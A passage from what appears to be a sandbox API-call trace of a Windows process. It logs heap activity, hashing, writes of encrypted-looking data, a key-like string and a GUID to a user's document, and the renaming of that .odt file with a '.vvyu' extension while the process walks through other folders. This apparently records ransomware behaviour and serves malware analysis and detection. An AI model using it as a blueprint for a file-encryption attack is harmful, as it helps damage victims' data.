(HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.594] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.594] GetLastError () returned 0x0 [0192.594] CryptDestroyHash (hHash=0x2a05e28) returned 1 [0192.594] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.595] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.595] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0192.595] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x67f0) returned 0x2af5168 [0192.595] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3b70 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61a0 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3bb8 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61b8 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61e8 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6248 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6200 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.596] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0192.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6248 [0192.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0192.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6200 [0192.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae61e8 [0192.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0192.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0192.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0192.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0192.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.599] GetCurrentThreadId () returned 0x5d8 [0192.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae74e8 [0192.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0192.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.600] GetCurrentThreadId () returned 0x5d8 [0192.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0192.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6248 [0192.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61e8 [0192.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0192.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6200 [0192.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61d0 [0192.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6260 [0192.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0192.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6230 [0192.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6218 [0192.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6278 [0192.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6218 [0192.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0192.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0192.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61e8 [0192.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0192.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0192.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0192.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0192.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0192.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0192.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0192.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0192.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3bb8 | out: hHeap=0x2c0000) returned 1 [0192.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0192.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0192.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.612] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x67e2, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x67e2, lpOverlapped=0x0) returned 1 [0192.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.613] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x67e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.613] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0192.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0192.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.614] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.615] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.615] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.615] CloseHandle (hObject=0x584) returned 1 [0192.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0192.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0192.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0192.617] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\Ct fMZqR_ubHOI0.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ct fmzqr_ubhoi0.odt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\Ct fMZqR_ubHOI0.odt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ct fmzqr_ubhoi0.odt.vvyu")) returned 1 [0192.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.622] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0192.626] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3290cde0, ftCreationTime.dwHighDateTime=0x1d8a55a, ftLastAccessTime.dwLowDateTime=0x229f3950, ftLastAccessTime.dwHighDateTime=0x1d8a742, ftLastWriteTime.dwLowDateTime=0x229f3950, ftLastWriteTime.dwHighDateTime=0x1d8a742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hfGoG8BRVBw", cAlternateFileName="HFGOG8~1")) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0192.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x29b9f30 [0192.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0192.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0192.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05de8 | out: hHeap=0x2c0000) returned 1 [0192.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0192.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0192.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.628] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58435230, ftCreationTime.dwHighDateTime=0x1d8a0a3, ftLastAccessTime.dwLowDateTime=0xd26626c0, ftLastAccessTime.dwHighDateTime=0x1d8a664, ftLastWriteTime.dwLowDateTime=0xd26626c0, ftLastWriteTime.dwHighDateTime=0x1d8a664, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HIm fL", cAlternateFileName="HIMFL~1")) returned 1 [0192.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0192.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edc48 [0192.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0192.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0192.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0192.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ae8eb8 [0192.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0192.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 